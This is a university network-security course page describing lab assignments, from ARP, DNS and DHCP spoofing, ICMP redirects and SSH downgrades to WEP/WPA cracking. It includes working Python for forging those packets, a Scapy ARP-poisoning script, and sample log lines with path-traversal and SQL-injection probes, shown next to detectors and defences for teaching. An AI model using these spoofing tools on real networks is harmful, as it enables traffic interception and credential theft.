TIES327 – Network Security (3-5 ECTS)
Prof. Timo Hämäläinen
Department of Mathematical Information Technology IT Faculty
Important note!
If you have completed the "old course" TIES326 in 2012 or 2013, you will not get credits for this TIES327, as its content has more than 50% of its assignments in common with TIES326 as given in 2012 and 2013.
Those students who have completed TIES326 before
Goals of the course
Students understand what the term "security" encompasses, in particular from the point of view of networks and services
... get familiar with the different security aspects and understand the necessary terms
... are capable of applying the various tools for auditing and protecting against network attacks
... learn to look for new knowledge in this area
A feeling of safety must not rest on ignorance!
The course focuses on hands-on work with security issues and learning by doing different network security exercises
Prerequisites
• Basic knowledge of networks, TCP/IP protocols and programming
• For example the following courses (or similar knowledge)
• ITKP101 - Tietokone ja tietoverkot työvälineenä (The computer and networks as a tool)
• ITKP104 - Tietoverkot (Computer networks)
How to complete the course?
• Complete the assignments
• Groups of 1-3 students
• You need at least 50% of the total points and at least 50% of the points of each assignment.
• 3 ECTS: complete assignments 1-9
• 4 ECTS: complete assignments 1-11
• 5 ECTS: complete all 13 assignments
• Different network attack configurations, and tools for protecting and analysing networks
• MITM, WLAN cracking, VPN, firewall, IDS etc.
• pfSense: http://www.pfsense.org/
• Snort: http://www.snort.org/
• Radamsa: http://code.google.com/p/ouspg/wiki/Radamsa
• Wireshark: http://www.wireshark.org/
• Scapy: http://secdev.org/projects/scapy/
• Kali Linux: http://www.kali.org/
About the assignments
1. Virtual network configuration
• In this first assignment you will create and configure a virtual network which will be used for testing different kinds of network attacks.
• To do this you need a PC with 2 GB of RAM (more is of course better!).
• We have used Ubuntu, but it is of course possible to make the same virtual network configuration on Windows or Mac OS by using the corresponding commands.
2. Security in social media / student presentations (lecture 3)
Groups of 1-4 students will make a presentation. The topic is security in social media (duration of the presentation 20-25 min).
The presentation should cover the following aspects. Even better if you can create your own live demo, e.g. like http://www.youtube.com/watch?v=-H1qjiwQldw:
1. What kinds of threats/attacks exist in social media?
• Social engineering, phishing, spam, code injection, XSS, CSRF/XSRF, DDoS etc.
2. How can you protect against these threats?
3. Possibilities and drawbacks of Web technologies
• Asynchronous JavaScript And XML (AJAX), Cascading Style Sheets (CSS), Flash, JSON and XML etc.
All groups will return a www link (no attachment!) to their presentation by 9.11 at 23:59 to: [email protected].
About the assignments
3. WEP Cracking
• In this assignment you are going to crack a WEP key with the tools available at: http://aircrack-ng.org/
• It is intended to build your basic skills and get you familiar with wireless network security concepts.
• It assumes you have a working wireless card with drivers already patched for injection.
• The basic concept behind this work is to use aireplay-ng to replay a captured ARP packet, which makes the network generate new encrypted packets with new unique IVs.
• In turn, aircrack-ng uses the new unique IVs to recover the WEP key.
4. WPA Cracking
• This assignment walks you through cracking WPA/WPA2 networks which use pre-shared keys.
• We recommend you do some background reading to better understand what WPA/WPA2 is.
• WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys.
• So make sure airodump-ng shows the network as having the authentication type PSK; otherwise, don't bother trying to crack it.
• There is another important difference between cracking WPA/WPA2 and WEP: the approach used to crack the WPA/WPA2 pre-shared key.
• Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute-force techniques (in practice, a dictionary attack) can be used against WPA/WPA2.
• That is because the per-session key is not static, so collecting IVs as when cracking WEP does not speed up the attack.
• The only thing that gives the information needed to start an attack is the four-way handshake between client and AP.
• The handshake is done when the client connects to the network.
• Although not absolutely true, for the purposes of this assignment, consider it true.
• Since the pre-shared key can be from 8 to 63 characters in length, exhaustive search is effectively impossible; the attack only succeeds if the passphrase is in your wordlist.
5. ARP Poisoning
• In this assignment you are going to perform two Man-In-The-Middle (MITM) attacks: poisoning ARP tables and redirecting ICMP traffic.
• ARP poisoning is also known as ARP spoofing or ARP poison routing.
• So what basically is ARP poisoning?
• It is a technique which allows an attacker to sniff traffic on a LAN, monitor it and even stop it.
• ARP poisoning is done by sending forged (spoofed) ARP messages onto the Ethernet LAN.
• By doing so the attacker associates its own MAC address with the IP address of another node on the network (typically the default gateway), so the victim sends the gateway's traffic to the attacker instead.
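The following is an added example (not part of the course material or its Python scripts) showing both sides of the technique described above: it builds the raw Ethernet/ARP frame a poisoner sends, and a small arpwatch-style check that flags the IP-to-MAC "flip" such frames cause. Only the standard library is used, so it runs without Scapy. The MAC addresses, the gateway 192.168.72.2 and the victim 192.168.72.128 are constructed sample values (the two IPs are those of the course's usage example).

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join("%02x" % b for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(op: int, sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame (dst, src, type 0x0806) followed by a 28-byte ARP
    packet for Ethernet/IPv4: htype=1, ptype=0x0800, hlen=6, plen=4, opcode."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def poison_frame(attacker_mac: str, victim_mac: str, victim_ip: str, gateway_ip: str) -> bytes:
    """The frame an ARP poisoner sends to the victim every few seconds: an
    unsolicited reply saying "gateway_ip is-at attacker_mac". The victim's
    cache entry for the gateway now points at the attacker."""
    return build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)


def parse_arp(frame: bytes) -> dict:
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol types")
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


class ArpWatch:
    """arpwatch-style detector: remember the first MAC seen for every IP and
    report a "flip" when a later reply rebinds that IP to a different MAC.
    Poisoning produces exactly such flips, repeated every few seconds."""

    def __init__(self):
        self.bindings = {}

    def observe(self, frame: bytes):
        arp = parse_arp(frame)
        if arp["op"] != ARP_REPLY:
            return None
        known = self.bindings.setdefault(arp["sender_ip"], arp["sender_mac"])
        if known != arp["sender_mac"]:
            return "ALERT: %s moved from %s to %s" % (arp["sender_ip"], known, arp["sender_mac"])
        return None
```

The course's own Scapy script sends `ARP()` with the default opcode 1 (who-has) rather than a reply; most stacks update an existing cache entry from either opcode, which is why that script works too. Static ARP entries for the gateway, or a detector like the one above, are the usual defences.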
5. ICMP Redirection
• ICMP (Internet Control Message Protocol) is used to send error messages, report problems and for routing purposes.
• When a router sends a redirect to a client indicating a shorter route to some particular destination, a host-route entry is added to the client's routing table.
• The attacker can change the client's routing table so that traffic from the client to a web server is redirected to the attacker.
• For this purpose the attacker sends an ICMP redirect message to the client, in which the source IP is the gateway, the source IP of the quoted (redirected) datagram is the client, the destination IP of the quoted datagram is the web server, and the new gateway is the attacker.
• After the client updates its routing table with the web server's IP address
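An added example (not from the course material) that builds the redirect message exactly as described above, parses it back, and then applies the acceptance checks a hardened host makes before installing the route. The policy function is modelled on the Linux sysctls accept_redirects and secure_redirects; the addresses (gateway 192.168.1.1, victim 192.168.1.50, attacker 192.168.1.102, web server 198.51.100.10) and the quoted TCP segment are constructed sample values.

```python
import struct
import ipaddress


def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum (one's-complement sum, complemented)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int, ttl: int = 64) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_icmp_redirect(spoofed_src: str, victim: str, new_gateway: str, orig_dst: str) -> bytes:
    """IP packet carrying an ICMP Redirect for Host (type 5, code 1).
    spoofed_src is the real gateway's address (the attacker forges it) and
    new_gateway is the attacker. Per RFC 792 the body quotes the IP header
    plus the first 8 bytes of a datagram the victim sent to orig_dst; here
    that is a constructed TCP segment from port 40000 to port 80."""
    quoted = ipv4_header(victim, orig_dst, 6, 8) + struct.pack("!HHI", 40000, 80, 1)
    icmp = struct.pack("!BBH4s", 5, 1, 0, ipaddress.IPv4Address(new_gateway).packed) + quoted
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    return ipv4_header(spoofed_src, victim, 1, len(icmp)) + icmp


def parse_icmp_redirect(pkt: bytes) -> dict:
    ihl = (pkt[0] & 0x0F) * 4
    icmp = pkt[ihl:]
    itype, code, _, gateway = struct.unpack("!BBH4s", icmp[:8])
    quoted = icmp[8:]
    return {
        "src": str(ipaddress.IPv4Address(pkt[12:16])),
        "proto": pkt[9],
        "type": itype,
        "code": code,
        "gateway": str(ipaddress.IPv4Address(gateway)),
        "orig_src": str(ipaddress.IPv4Address(quoted[12:16])),
        "orig_dst": str(ipaddress.IPv4Address(quoted[16:20])),
        "checksum_ok": checksum(icmp) == 0,   # a valid message sums to zero
    }


def should_install_route(info: dict, my_ip: str, current_gateway: str, known_gateways: set,
                         netmask: str = "255.255.255.0", accept_redirects: bool = True,
                         secure_redirects: bool = True):
    """Host-side acceptance policy, modelled on net.ipv4.conf.*.accept_redirects
    and secure_redirects. Returns (accepted, reasons_for_rejection)."""
    reasons = []
    if not accept_redirects:
        reasons.append("accept_redirects=0: redirects ignored entirely")
    if info["proto"] != 1 or info["type"] != 5:
        reasons.append("not an ICMP redirect")
    if not info["checksum_ok"]:
        reasons.append("bad ICMP checksum")
    if info["src"] != current_gateway:
        reasons.append("sender is not the current first-hop gateway")
    if info["orig_src"] != my_ip:
        reasons.append("quoted datagram was not sent by us")
    onlink = ipaddress.IPv4Network("%s/%s" % (my_ip, netmask), strict=False)
    if ipaddress.IPv4Address(info["gateway"]) not in onlink:
        reasons.append("new gateway is not on our link")
    if secure_redirects and info["gateway"] not in known_gateways:
        reasons.append("secure_redirects=1: new gateway is not a configured gateway")
    return (not reasons, reasons)
```

The point the policy function makes: because the attacker forges the gateway's source address and sits on the same subnet, the sender and on-link checks pass. Only secure_redirects (the new gateway must already be a configured one) or disabling redirects altogether stops the attack.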
6. DNS spoofing
• In this exercise you are going to perform two Man-In-The-Middle (MITM) attacks: spoofing DNS and DHCP servers.
• The Domain Name System translates names that humans can understand into IP addresses.
• First, the client sends a DNS query and the DNS server responds with a DNS response.
• The DNS query and response carry the same transaction ID and the same question.
• Then the client updates its DNS cache with the domain name and IP address from the response.
• Assume that the attacker wants to change the client's DNS cache so that traffic from the client to the domain web.seclab.jyu.fi is redirected to the attacker's server 192.168.1.102.
• For this purpose the attacker sniffs DNS queries from the client, waits for a query for the relevant name, and then spoofs a DNS response, e.g. with the attacker's IP.
• The client updates its DNS cache and therefore all traffic goes to the attacker. The attacker keeps spoofing DNS responses to maintain the poisoned cache entry.
• However, the DNS query also arrives at the real DNS server, which responds with a legitimate DNS response.
• When the client gets the legitimate response, it will update its cache; the spoofed response therefore has to win the race and arrive first.
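An added example (not part of the course scripts) of the exchange above at the wire level: it builds a query for web.seclab.jyu.fi, forges the response an on-path attacker would send (same transaction ID and question, one A record for 192.168.1.102), and implements the checks a stub resolver makes before caching an answer (RFC 5452: matching source port, transaction ID and question). The transaction ID 0x1A2B and the port numbers are constructed sample values; the name and the attacker's address are those of the assignment text.

```python
import struct


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, off: int):
    """Returns (name, offset after the name); follows compression pointers."""
    labels = []
    while True:
        length = msg[off]
        if length == 0:
            return ".".join(labels) + ".", off + 1
        if length & 0xC0 == 0xC0:                       # RFC 1035 4.1.4 pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(msg, ptr)
            return ".".join(labels + [tail.rstrip(".")]) + ".", off + 2
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length


def build_query(txid: int, qname: str) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)        # RD set, 1 question
    return header + encode_name(qname) + struct.pack("!HH", 1, 1)    # type A, class IN


def parse_message(msg: bytes) -> dict:
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    off += 4
    answers = []
    for _ in range(ancount):
        name, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, ttl, ".".join(str(b) for b in rdata)))
    return {"txid": txid, "qr": bool(flags & 0x8000),
            "question": (qname, qtype, qclass), "answers": answers}


def build_spoofed_response(query: bytes, ip: str, ttl: int = 300) -> bytes:
    """What the sniffing attacker sends: copy the victim's transaction ID and
    question section verbatim, set QR/RD/RA, append one A record for ip.
    Assumes the query carries exactly one question and no other records."""
    q = parse_message(query)
    header = struct.pack("!HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0)
    question = query[12:]
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + bytes(int(x) for x in ip.split("."))
    return header + question + answer


def resolver_accepts(query: bytes, query_port: int, response: bytes, response_port: int):
    """Stub-resolver side: the reply must come back to the port the query left
    from, carry the same transaction ID, be a response, and repeat the question."""
    q, r = parse_message(query), parse_message(response)
    if response_port != query_port:
        return False, "port mismatch"
    if not r["qr"]:
        return False, "not a response"
    if r["txid"] != q["txid"]:
        return False, "transaction ID mismatch"
    if r["question"] != q["question"]:
        return False, "question mismatch"
    return True, "accepted"
```

An attacker who has sniffed the query passes all three checks trivially, which is why this attack is easy on a LAN after ARP poisoning; an off-path attacker has to guess the 16-bit ID and the source port, which is what the port and ID checks are there for.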
6. DHCP spoofing
• DHCP (Dynamic Host Configuration Protocol) is used to configure the network settings of hosts on IP networks.
• DHCP allows hosts to be dynamically configured with an IP address, subnet mask, gateway address and DNS server address.
• It works as follows: first, the client broadcasts a DHCP discover containing a transaction ID.
• The DHCP server responds with a DHCP offer which contains the same transaction ID.
• The client then sends a DHCP request and the DHCP server responds with a DHCP Ack.
• After seeing the DHCP discover, the attacker spoofs a DHCP offer assigning a malicious gateway and/or DNS server.
• After that the client responds with a DHCP request and the attacker spoofs a DHCP Ack as well.
• Finally, the client updates its DNS server and gateway addresses.
• However, when the DHCP discover arrives at the legitimate DHCP server, this server also responds to the client with a legitimate DHCP offer.
• If the client gets the legitimate offer first, then DHCP spoofing will not work.
• For this reason, the attacker DoSes the DHCP server during the attack so that the DHCP server cannot respond to clients.
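An added example (not from the course material) of the discover/offer step above: a minimal DHCP encoder and decoder, the spoofed offer that copies the client's transaction ID and hands out the attacker's address as both router (option 3) and DNS server (option 6), and the switch-side check known as DHCP snooping, which drops server messages arriving on untrusted ports. The client MAC, the transaction ID, the attacker 192.168.1.102, the offered address 192.168.1.50 and the port names are constructed sample values.

```python
import struct
import ipaddress

MAGIC = b"\x63\x82\x53\x63"
BOOTREQUEST, BOOTREPLY = 1, 2
DISCOVER, OFFER, REQUEST, ACK, NAK = 1, 2, 3, 5, 6
FIXED = "!BBBBIHH4s4s4s4s16s64s128s"          # 236-byte BOOTP header


def ip4(addr: str) -> bytes:
    return ipaddress.IPv4Address(addr).packed


def build_dhcp(op: int, xid: int, mac: bytes, yiaddr: str = "0.0.0.0", options=()) -> bytes:
    """BOOTP header + magic cookie + TLV options + end marker (0xFF)."""
    flags = 0x8000 if op == BOOTREQUEST else 0      # client asks for broadcast replies
    fixed = struct.pack(FIXED, op, 1, 6, 0, xid, 0, flags,
                        b"\0" * 4, ip4(yiaddr), b"\0" * 4, b"\0" * 4,
                        mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    opts = b"".join(bytes([code, len(val)]) + val for code, val in options)
    return fixed + MAGIC + opts + b"\xff"


def parse_dhcp(pkt: bytes) -> dict:
    (op, _, hlen, _, xid, _, _, _, yiaddr, _, _, chaddr, _, _) = struct.unpack(FIXED, pkt[:236])
    if pkt[236:240] != MAGIC:
        raise ValueError("missing DHCP magic cookie")
    options, off = {}, 240
    while off < len(pkt) and pkt[off] != 0xFF:
        if pkt[off] == 0:                            # pad option
            off += 1
            continue
        code, length = pkt[off], pkt[off + 1]
        options[code] = pkt[off + 2:off + 2 + length]
        off += 2 + length
    return {"op": op, "xid": xid, "mac": chaddr[:hlen],
            "yiaddr": str(ipaddress.IPv4Address(yiaddr)),
            "type": options.get(53, b"\0")[0], "options": options}


def build_discover(xid: int, mac: bytes) -> bytes:
    return build_dhcp(BOOTREQUEST, xid, mac,
                      options=[(53, bytes([DISCOVER])), (55, bytes([1, 3, 6]))])


def build_spoofed_offer(discover: bytes, attacker_ip: str, offered_ip: str,
                        netmask: str = "255.255.255.0", lease: int = 3600) -> bytes:
    """The rogue server's reply: same xid and client MAC as the discover,
    attacker as router (3) and DNS server (6)."""
    d = parse_dhcp(discover)
    if d["type"] != DISCOVER:
        raise ValueError("not a DHCPDISCOVER")
    opts = [(53, bytes([OFFER])), (54, ip4(attacker_ip)), (51, struct.pack("!I", lease)),
            (1, ip4(netmask)), (3, ip4(attacker_ip)), (6, ip4(attacker_ip))]
    return build_dhcp(BOOTREPLY, d["xid"], d["mac"], offered_ip, opts)


def dhcp_snooping_allows(pkt: bytes, ingress_port: str, trusted_ports: set) -> bool:
    """Switch-side DHCP snooping: OFFER/ACK/NAK are only accepted from ports
    where the real server lives; everything else the rogue sends is dropped."""
    if parse_dhcp(pkt)["type"] in (OFFER, ACK, NAK) and ingress_port not in trusted_ports:
        return False
    return True
```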
7. Annoying HTTP server and bank attack
• This assignment deals with two Man-In-The-Middle (MITM) attacks: an annoying HTTP server and a bank attack.
• Once an attacker is located in the middle between the victim and other network nodes, he can easily change the HTTP requests and responses which pass through him.
• In this section, the attacker changes the web pages which the victim requested from a web site to make the victim feel nervous.
• For this attack, the attacker first poisons the ARP cache of the victim in order to be "in the middle".
• Then, when the victim requests a web page, the attacker modifies all pictures contained on the page and sends the result to the victim.
Bank attack
• In this section, we use the case where the attacker places himself "in the middle" and then steals money from the victim's bank account when the victim logs in to the system.
8. SSH downgrading
• Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote shell services or command execution and other secure network services between two networked computers, which it connects via a secure channel over an insecure network.
• The protocol specification distinguishes two major versions, referred to as SSH-1 and SSH-2.
• Here we consider the most famous example of a downgrade attack, where the attacker forces the client and the server to use the insecure SSH-1 protocol.
• The client sends a request to establish an SSH connection to the server and asks which version it supports. The server answers with one of:
- SSH-2.xx, i.e. the server supports only SSH-2,
- SSH-1.99, i.e. the server supports both SSH-1 and SSH-2,
- SSH-1.51, i.e. the server supports only SSH-1.
• In our example, the server is configured to support both SSH-1 and SSH-2, and the client is set to use SSH-2 and SSH-1 with SSH-2 as its preference.
• In this case the attacker, if he is already located in the middle (e.g. after ARP poisoning), changes the answer by modifying the "1.99" string to "1.51" to indicate to the client that the server supports only SSH-1, thus forcing the client to open an SSH-1 connection.
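An added example (not one of the course's Python scripts) of the version exchange above: it parses the server's identification string in the RFC 4253 format "SSH-protoversion-softwareversion [comments]", applies the one-byte rewrite the attacker in the middle makes, and shows how the client's version policy decides whether the downgrade succeeds. The software version string OpenSSH_5.3 is a constructed sample value.

```python
import re

# "SSH-1.99-OpenSSH_5.3 some comment\r\n"  ->  proto, software, comments
BANNER_RE = re.compile(r"^SSH-(?P<proto>[0-9.]+)-(?P<software>\S+)(?: (?P<comments>[^\r\n]*))?\r?\n?$")


def parse_banner(line: str):
    m = BANNER_RE.match(line)
    if not m:
        raise ValueError("malformed SSH identification string: %r" % line)
    return m.group("proto"), m.group("software"), m.group("comments") or ""


def versions_offered(proto: str) -> set:
    """Map the protoversion field to the major versions the server will speak."""
    if proto == "1.99":                 # RFC 4253 4.2: both SSH-1 and SSH-2
        return {"1", "2"}
    if proto.startswith("2."):
        return {"2"}
    if proto.startswith("1."):
        return {"1"}
    raise ValueError("unknown protocol version %r" % proto)


def mitm_downgrade(server_banner: str) -> str:
    """The attacker's edit to the first line it relays from the server."""
    return server_banner.replace("SSH-1.99-", "SSH-1.51-", 1)


def client_select(server_banner: str, supported=("2",), preferred: str = "2"):
    """Pick the major version a client with the given policy would use, or
    None if it would refuse the connection. supported=("2",) models an
    OpenSSH client with 'Protocol 2'; ("2", "1") models 'Protocol 2,1'."""
    offered = versions_offered(parse_banner(server_banner)[0])
    for version in (preferred,) + tuple(supported):
        if version in supported and version in offered:
            return version
    return None
```

The identification strings are exchanged before any key exchange, so nothing authenticates them at that point. In SSH-2 both strings are later bound into the exchange hash, so an edit would be caught once SSH-2 is negotiated; the downgrade avoids that by steering the client into SSH-1 first. The only robust fix is the client (and server) refusing SSH-1 outright.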
9. Reverse TCP attack
• Man-In-The-Middle attacks can be combined with such dangerous attacks as a reverse TCP connection.
• A firewall usually blocks inbound connections to listening ports, but does not block outgoing traffic; therefore a reverse connection is used to bypass firewall and router restrictions.
• For example, a Trojan horse running on a computer behind a firewall that blocks incoming connections can easily open an outbound connection to a remote host on the Internet.
• Once the connection is established, the remote host can send commands to the Trojan horse.
• Trojan horses that use a reverse connection therefore initiate the TCP handshake themselves, sending a SYN packet to the attacker's IP address.
10. Configuring a VPN connection with OpenVPN
• In this assignment you configure an OpenVPN server and client, set up your own Certificate Authority (CA), generate keys and sign certificates.
• In addition, it describes two-factor authentication where, in addition to the client certificate, the server checks a username and password when authenticating a connecting client.
11. Public-key cryptography with GNU Privacy Guard
• Public-key cryptography allows you to communicate with someone securely without exchanging a secret password first. With public-key encryption, instead of sharing a password, each party generates a "keypair" consisting of a "public" key and a "secret/private" key.
• Each party can then publish their public key to the world or send it directly to the other party, while keeping their secret key private and safe. If you have a person's public key, you can do a few things with it:
• Encrypt a message that only that person can decrypt (they need their secret key to decrypt it).
• Verify that the person signed a message with their secret key. This also lets you verify strongly that the message was not corrupted or modified in transmission.
• With your secret key, you can do the following things:
• Decrypt messages encrypted with your public key.
• Sign messages that others can verify came from you (they need your public key to verify the signature).
• This assignment explains how to configure and use a Public Key Infrastructure (PKI), and how to encrypt files and sign emails using GNU Privacy Guard (GPG).
12. Configuration of Snort and pfSense
• In this assignment you are going to install, configure and tune Snort and pfSense for protecting your network.
• Snort is a free and open source, signature-based network intrusion detection and prevention system.
13. Network traffic anomaly detection
• In this assignment, an HTTP access log file is preprocessed into a numerical matrix, anomalous queries are found using dimensionality reduction and clustering, and finally the anomalous log lines are analysed.
• In this exercise, it is assumed that some kind of Linux distribution is used (running in VirtualBox etc. is fine).
• Windows installation might be possible, but it is much easier on Linux.
• In the following examples, the Octave software is used.
• In addition, we need the package octave-statistics.
• If available, Matlab uses the same syntax.
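An added example (not the assignment's Octave code) of the pipeline described above in plain Python: the request part of each access-log line is turned into a row of character-bigram frequencies (the numerical matrix), each row is scored, and the outliers are reported together with the log lines they came from. As a simplification of the assignment, the dimensionality-reduction and clustering step is replaced by the distance of each row from the centroid with a z-score threshold; the twelve log lines are constructed (ten ordinary page requests, one path traversal and one SQL-injection probe), not a real capture.

```python
import math
import re
from collections import Counter

# Constructed sample access log in Apache combined format (not a real capture).
# The last two requests are the ones we expect to surface as anomalies.
LOG_LINES = [
    '192.168.72.128 - - [12/Nov/2014:10:01:%02d +0200] "GET /index.php?page=%d HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"' % (i, i) for i in range(1, 11)
] + [
    '192.168.72.130 - - [12/Nov/2014:10:02:11 +0200] '
    '"GET /index.php?page=../../../../../etc/passwd HTTP/1.1" 404 221 "-" "curl/7.35.0"',
    '192.168.72.130 - - [12/Nov/2014:10:02:15 +0200] '
    '"GET /index.php?page=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 498 "-" "curl/7.35.0"',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def extract_requests(lines):
    """Step 1: pull the request target (path + query string) out of each line."""
    return [m.group(1) for m in map(REQUEST_RE.search, lines) if m]


def ngram_matrix(requests, n=2):
    """Step 2: one row per request, one column per character n-gram seen in
    the whole log, holding that n-gram's relative frequency in the request."""
    counts = [Counter(r[i:i + n] for i in range(len(r) - n + 1)) for r in requests]
    vocab = sorted(set().union(*counts))
    rows = [[c[g] / sum(c.values()) for g in vocab] for c in counts]
    return vocab, rows


def distance_to_centroid(rows):
    """Step 3: score every row by its Euclidean distance from the mean row."""
    k, dim = len(rows), len(rows[0])
    mean = [sum(r[j] for r in rows) / k for j in range(dim)]
    return [math.sqrt(sum((r[j] - mean[j]) ** 2 for j in range(dim))) for r in rows]


def find_anomalies(lines, n=2, z=1.5):
    """Step 4: flag requests scoring more than z standard deviations above the
    mean score. Returns (request, score, original log line) triples, most
    anomalous first, so the analyst can go back to the raw lines."""
    requests = extract_requests(lines)
    _, rows = ngram_matrix(requests, n)
    scores = distance_to_centroid(rows)
    mu = sum(scores) / len(scores)
    sd = math.sqrt(sum((s - mu) ** 2 for s in scores) / len(scores))
    flagged = [(r, s, line) for r, s, line in zip(requests, scores, lines) if sd and s > mu + z * sd]
    return sorted(flagged, key=lambda item: item[1], reverse=True)


if __name__ == "__main__":
    for request, score, line in find_anomalies(LOG_LINES):
        print("%.3f  %s" % (score, request))
```

The same matrix is what you would feed to PCA and clustering in Octave; the centroid distance is only the simplest possible scoring on top of it.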
Tools used in assignments
Kali Linux
http://www.kali.org/
Some tools used in assignments
Python https://www.python.org/
Scapy
http://secdev.org/projects/scapy/
Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.
It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.).
Tools used in assignments
Python scripts: ARP poisoning, ICMP Redirection, DNS spoofing, DHCP spoofing, Annoying HTTP server, Bank attack, SSH downgrading
Other files: Login database for the bank server, Certificate file for the bank server, Bank server
An example: ARP poisoning (Python)
from scapy.all import ARP, send
from time import sleep
import threading
import os
import sys


class SpoofThread(threading.Thread):
    """Sends one forged ARP packet to the victim every 5 seconds, claiming
    that the spoofed source IP (normally the gateway) is at our own MAC."""

    def __init__(self, victim, gateway):
        threading.Thread.__init__(self)
        self.packet = ARP()          # Scapy fills hwsrc with our own MAC
        self.packet.psrc = gateway   # IP address we pretend to be
        self.packet.pdst = victim    # IP address whose ARP cache we poison

    def run(self):
        counter = 0
        print("spoofing " + str(self.packet.pdst) + " every 5 seconds...")
        try:
            while True:
                send(self.packet, verbose=0)
                counter += 1
                print('poison #' + str(counter))
                sleep(5)
        except Exception as e:
            print(type(e), e.args, e)


if __name__ == '__main__':
    if len(sys.argv) != 3:
        sys.exit('Usage: %s <victim(s) IP(s)> <spoofed source IP> \n'
                 'example: python ArpSpoofing.py 192.168.72.128 192.168.72.2'
                 % os.path.basename(__file__))
    targets_dest_ips = [sys.argv[1]]
    spoofed_src_ip = sys.argv[2]
    for ip in targets_dest_ips:
        SpoofThread(ip, spoofed_src_ip).start()
Course grading

Total points   Grade
55             5
50             4
45             3
40             2
30             1
Work load
About the lectures
The lectures are intended to provide an introduction to various network security topics and examples
The course focuses on hands-on work with security issues and learning by doing (not learning by listening!).
Some literature:
• Lots of research papers:
  - IEEE Xplore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp
  - ACM, http://portal.acm.org/dl.cfm
  - Google Scholar, http://scholar.google.com/
  - http://site.ebrary.com/lib/jyvaskyla
• Introduction to Network Security
• Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions
L1: Introduction to network security
What is security and what are its goals
Threats to networks and IT systems
L2: Recent networking security threats/malwares
(visiting lecture by Matti Kannela)
L3: Security in social media (student presentations)
Assignment no. 2 (see the assignment description above)
L4: Security for 4G Cellular Networks
(visiting lecture by Zheng Chang)
Cellular network security issues (PHY/MAC layers)